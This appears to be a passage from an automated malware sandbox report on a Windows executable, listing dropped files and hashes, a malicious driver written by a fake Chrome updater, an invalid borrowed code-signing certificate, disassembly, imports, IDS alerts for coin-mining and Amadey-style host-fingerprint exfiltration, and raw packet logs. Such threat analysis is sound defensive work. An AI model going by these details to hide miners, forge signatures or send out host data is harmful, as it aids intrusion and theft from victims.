                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Windows\Temp\__PSScriptPolicyTest_g1rxsjod.is5.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Windows\Temp\__PSScriptPolicyTest_lfyvjch0.gsz.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Windows\Temp\__PSScriptPolicyTest_rqrefcga.kuf.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Windows\Temp\__PSScriptPolicyTest_s1u0d5sj.rn0.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Windows\Temp\__PSScriptPolicyTest_tho4ptvn.syz.psm1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Windows\Temp\__PSScriptPolicyTest_tsz5ivtr.stc.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Windows\Temp\__PSScriptPolicyTest_x0g4tlq1.vzw.ps1

                                                        Download File
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):60
                                                        Entropy (8bit):4.038920595031593
                                                        Encrypted:false
                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                        Malicious:false
                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                        C:\Windows\Temp\xptjtnajcbas.sys

                                                        Download File
                                                        Process:C:\ProgramData\Google\Chrome\updater.exe
                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):14544
                                                        Entropy (8bit):6.2660301556221185
                                                        Encrypted:false
                                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                        • Antivirus: Virustotal, Detection: 3%, Browse
                                                        Joe Sandbox View:
                                                        • Filename: OTm8DpW32j.exe, Detection: malicious, Browse
                                                        • Filename: zufmUwylvo.exe, Detection: malicious, Browse
                                                        • Filename: zufmUwylvo.exe, Detection: malicious, Browse
                                                        • Filename: 0NSjUT34gS.exe, Detection: malicious, Browse
                                                        • Filename: eshkere.bat, Detection: malicious, Browse
                                                        • Filename: frik.exe, Detection: malicious, Browse
                                                        • Filename: Google Chrome.exe, Detection: malicious, Browse
                                                        • Filename: e7WMhx18XN.exe, Detection: malicious, Browse
                                                        • Filename: GcqJPBLD2Q.exe, Detection: malicious, Browse
                                                        • Filename: C5Lg2JSPlD.exe, Detection: malicious, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                        Entropy (8bit):6.563142554876773
                                                        TrID:
                                                        • Win64 Executable GUI (202006/5) 92.65%
                                                        • Win64 Executable (generic) (12005/4) 5.51%
                                                        • Generic Win/DOS Executable (2004/3) 0.92%
                                                        • DOS Executable Generic (2002/1) 0.92%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:egFMhHSlmf.exe
                                                        File size:5'536'856 bytes
                                                        MD5:1417d38c40d85d1c4eb7fad3444ca069
                                                        SHA1:27d8e2ca9537c80d1c1148830f9a6499f1e3e797
                                                        SHA256:5f7c6cdea3c4e825af1d796cbd34b2d45b2b6fabed130e717a30a6d871993f5d
                                                        SHA512:a169f8c5925977a984bc00a2b379205ed527777865215e4ffdfeb30084d1ed08f7bb5222db8898161f1e6151d4a75e8ccc366543cf041e47effc21dcf4c351ab
                                                        SSDEEP:98304:z0uVyIJFN+YjxW2q0pOFklpKRDArh51NuIQIi7by2ud3RK:QucIJbx9TOFkMOL1NuIQIi7by2uRRK
                                                        TLSH:8346222438855716F769B0F9CAE194C5CB1D39B5AF0401AF8FB6D836F40AEC891F19CA
                                                        File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."......f....R.....@..........@..............................U...........`........................................

                                                        File Icon

                                                        Icon Hash:00928e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x140001140
                                                        Entrypoint Section:.text
                                                        Digitally signed:true
                                                        Imagebase:0x140000000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x66FFB086 [Fri Oct 4 09:08:22 2024 UTC]
                                                        TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                        CLR (.Net) Version:
                                                        OS Version Major:6
                                                        OS Version Minor:0
                                                        File Version Major:6
                                                        File Version Minor:0
                                                        Subsystem Version Major:6
                                                        Subsystem Version Minor:0
                                                        Import Hash:b237ac2118704db9e7609540658f5790

                                                        Authenticode Signature

                                                        Signature Valid:false
                                                        Signature Issuer:CN=Symantec Class 3 Extended Validation Code Signing CA - G3, OU=Symantec Trust Network, O=Symantec Corporation, C=US
                                                        Signature Validation Error:The digital signature of the object did not verify
                                                        Error Number:-2146869232
                                                        Not Before, Not After
                                                        • 28/02/2019 19:00:00 28/02/2022 18:59:59
                                                        Subject Chain
                                                        • CN="Samsung Electronics CO., LTD.", O="Samsung Electronics CO., LTD.", L=Suwon-si, S=Gyeonggi-do, C=KR, SERIALNUMBER=130111-0006246, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.1=Suwon-si, OID.1.3.6.1.4.1.311.60.2.1.2=Gyeonggi-do, OID.1.3.6.1.4.1.311.60.2.1.3=KR
                                                        Version:3
                                                        Thumbprint MD5:BD27A85108500F98F2EFCFEDCA604C05
                                                        Thumbprint SHA-1:F0601C7ABE32E45183C7A63DA1B65EDB15B467C2
                                                        Thumbprint SHA-256:1EC5BB5496E64686460BE37E85F67172EDCF1C3A037CEBEF98671DC6CDAABD2D
                                                        Serial:7D7389F5AE537BB23B9C912C5F57D2F6

                                                        Entrypoint Preview

                                                        Instruction
                                                        dec eax
                                                        sub esp, 28h
                                                        dec eax
                                                        mov eax, dword ptr [00016ED5h]
                                                        mov dword ptr [eax], 00000001h
                                                        call 00007F385CB6A04Fh
                                                        nop
                                                        nop
                                                        nop
                                                        dec eax
                                                        add esp, 28h
                                                        ret
                                                        nop
                                                        inc ecx
                                                        push edi
                                                        inc ecx
                                                        push esi
                                                        push esi
                                                        push edi
                                                        push ebx
                                                        dec eax
                                                        sub esp, 20h
                                                        dec eax
                                                        mov eax, dword ptr [00000030h]
                                                        dec eax
                                                        mov edi, dword ptr [eax+08h]
                                                        dec eax
                                                        mov esi, dword ptr [00016EC9h]
                                                        xor eax, eax
                                                        dec eax
                                                        cmpxchg dword ptr [esi], edi
                                                        sete bl
                                                        je 00007F385CB6A070h
                                                        dec eax
                                                        cmp edi, eax
                                                        je 00007F385CB6A06Bh
                                                        dec esp
                                                        mov esi, dword ptr [0001C869h]
                                                        nop word ptr [eax+eax+00000000h]
                                                        mov ecx, 000003E8h
                                                        inc ecx
                                                        call esi
                                                        xor eax, eax
                                                        dec eax
                                                        cmpxchg dword ptr [esi], edi
                                                        sete bl
                                                        je 00007F385CB6A047h
                                                        dec eax
                                                        cmp edi, eax
                                                        jne 00007F385CB6A029h
                                                        dec eax
                                                        mov edi, dword ptr [00016E90h]
                                                        mov eax, dword ptr [edi]
                                                        cmp eax, 01h
                                                        jne 00007F385CB6A04Eh
                                                        mov ecx, 0000001Fh
                                                        call 00007F385CB80164h
                                                        jmp 00007F385CB6A069h
                                                        cmp dword ptr [edi], 00000000h
                                                        je 00007F385CB6A04Bh
                                                        mov byte ptr [00545AF1h], 00000001h
                                                        jmp 00007F385CB6A05Bh
                                                        mov dword ptr [edi], 00000001h
                                                        dec eax
                                                        mov ecx, dword ptr [00016E7Ah]
                                                        dec eax
                                                        mov edx, dword ptr [00016E7Bh]
                                                        call 00007F385CB8015Bh
                                                        mov eax, dword ptr [edi]
                                                        cmp eax, 01h
                                                        jne 00007F385CB6A05Bh
                                                        dec eax
                                                        mov ecx, dword ptr [00016E50h]

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x1d6f80x3c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x54f0000x3c8.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x54c0000x198.pdata
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x5464000x1858.data
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x5500000x78.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x180a00x28.rdata
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x184100x138.rdata
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x1d8b00x178.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x164b60x16600d03219d5f5ad4c7cfc70b9bc974b0664False0.44303203561452514data6.184866719712703IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x180000x5eec0x60002fedb5f261c9dbe65c25a99867a8d2d9False0.5303955078125data5.114107887686323IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0x1e0000x52d9680x528e00fc80fcc82189b4d6496f3b54b94b924funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .pdata0x54c0000x1980x200fc487b8f37bf5b1308920cb5a80d51c4False0.52734375data3.6129282683966686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .00cfg0x54d0000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .tls0x54e0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x54f0000x3c80x4002c6a9469704cc65023e28ae6664ab248False0.3955078125data3.1182911646034395IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0x5500000x780x200309655bc677064f03faa827151e8adf3False0.240234375data1.4943492802650686IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_VERSION0x54f0600x368dataEnglishUnited States0.42545871559633025

                                                        Imports

                                                        DLLImport
                                                        msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strcat, strcpy, strlen, strncmp, strstr, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr
                                                        KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                        Possible Origin

                                                        Language of compilation systemCountry where language is spokenMap
                                                        EnglishUnited States

                                                        Network Behavior

                                                        Suricata IDS Alerts

                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                        2024-10-10T04:56:07.950720+02002047928ET MALWARE CoinMiner Domain in DNS Lookup (pool .supportxmr .com)2192.168.2.6612141.1.1.153UDP
                                                        2024-10-10T04:56:13.700818+02002044697ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M31192.168.2.649760188.114.97.3443TCP
                                                        2024-10-10T04:57:08.272795+02002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.665331188.114.97.3443TCP
                                                        2024-10-10T04:58:14.573518+02002051004ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request2192.168.2.665333188.114.97.3443TCP

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Oct 10, 2024 04:56:07.964621067 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:07.964710951 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:07.964803934 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:07.965301037 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:07.965334892 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:08.793833017 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:08.795420885 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:08.795449018 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:08.797419071 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:08.797511101 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:08.799001932 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:08.799092054 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:08.894412041 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:08.894452095 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:09.082083941 CEST49734443192.168.2.6104.26.3.16
                                                        Oct 10, 2024 04:56:09.082125902 CEST44349734104.26.3.16192.168.2.6
                                                        Oct 10, 2024 04:56:09.083427906 CEST49734443192.168.2.6104.26.3.16
                                                        Oct 10, 2024 04:56:09.093745947 CEST49734443192.168.2.6104.26.3.16
                                                        Oct 10, 2024 04:56:09.093801975 CEST44349734104.26.3.16192.168.2.6
                                                        Oct 10, 2024 04:56:09.099426985 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:09.099453926 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:09.249630928 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:09.558774948 CEST44349734104.26.3.16192.168.2.6
                                                        Oct 10, 2024 04:56:09.560138941 CEST49734443192.168.2.6104.26.3.16
                                                        Oct 10, 2024 04:56:09.560188055 CEST44349734104.26.3.16192.168.2.6
                                                        Oct 10, 2024 04:56:09.561769962 CEST44349734104.26.3.16192.168.2.6
                                                        Oct 10, 2024 04:56:09.561865091 CEST49734443192.168.2.6104.26.3.16
                                                        Oct 10, 2024 04:56:09.563927889 CEST49734443192.168.2.6104.26.3.16
                                                        Oct 10, 2024 04:56:09.564027071 CEST44349734104.26.3.16192.168.2.6
                                                        Oct 10, 2024 04:56:09.564084053 CEST49734443192.168.2.6104.26.3.16
                                                        Oct 10, 2024 04:56:09.564099073 CEST44349734104.26.3.16192.168.2.6
                                                        Oct 10, 2024 04:56:09.674889088 CEST49734443192.168.2.6104.26.3.16
                                                        Oct 10, 2024 04:56:09.833076954 CEST44349734104.26.3.16192.168.2.6
                                                        Oct 10, 2024 04:56:09.833262920 CEST44349734104.26.3.16192.168.2.6
                                                        Oct 10, 2024 04:56:09.833769083 CEST49734443192.168.2.6104.26.3.16
                                                        Oct 10, 2024 04:56:09.847776890 CEST49734443192.168.2.6104.26.3.16
                                                        Oct 10, 2024 04:56:09.847824097 CEST44349734104.26.3.16192.168.2.6
                                                        Oct 10, 2024 04:56:09.892834902 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:09.892926931 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:09.893002033 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:09.901251078 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:09.901287079 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:10.358515024 CEST44349728141.94.96.144192.168.2.6
                                                        Oct 10, 2024 04:56:10.581818104 CEST49728443192.168.2.6141.94.96.144
                                                        Oct 10, 2024 04:56:10.955677986 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:10.957190037 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:10.957237005 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:10.958883047 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:10.959070921 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:10.960973978 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:10.961074114 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:10.961244106 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:10.961253881 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:11.113102913 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:11.649880886 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:11.649946928 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:11.649966955 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:11.650053978 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:11.650064945 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:11.650083065 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:11.650151968 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:11.650152922 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:11.650152922 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:11.650152922 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:11.650252104 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:11.650315046 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:11.650674105 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:11.650695086 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:11.650748014 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:11.650748014 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:11.650770903 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:11.650796890 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:11.650823116 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:11.650845051 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:11.650859118 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:11.650998116 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:11.660660028 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:11.660691977 CEST4434974083.168.108.45192.168.2.6
                                                        Oct 10, 2024 04:56:11.660752058 CEST49740443192.168.2.683.168.108.45
                                                        Oct 10, 2024 04:56:11.808810949 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:11.808845043 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:11.808908939 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:11.825866938 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:11.825891018 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.304740906 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.306025982 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.306063890 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.307744026 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.307811022 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.309776068 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.309874058 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.310015917 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.310029984 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.394294977 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.687340021 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.687617064 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.688941956 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.691453934 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.691495895 CEST44349754172.67.19.24192.168.2.6
                                                        Oct 10, 2024 04:56:12.691543102 CEST49754443192.168.2.6172.67.19.24
                                                        Oct 10, 2024 04:56:12.942353964 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:12.942421913 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:12.942501068 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:12.951471090 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:12.951508045 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.454374075 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.455425024 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:13.455446005 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.457010031 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.457088947 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:13.458786011 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:13.458884001 CEST44349760188.114.97.3192.168.2.6
                                                        Oct 10, 2024 04:56:13.458961010 CEST49760443192.168.2.6188.114.97.3
                                                        Oct 10, 2024 04:56:13.458976030 CEST44349760188.114.97.3192.168.2.6
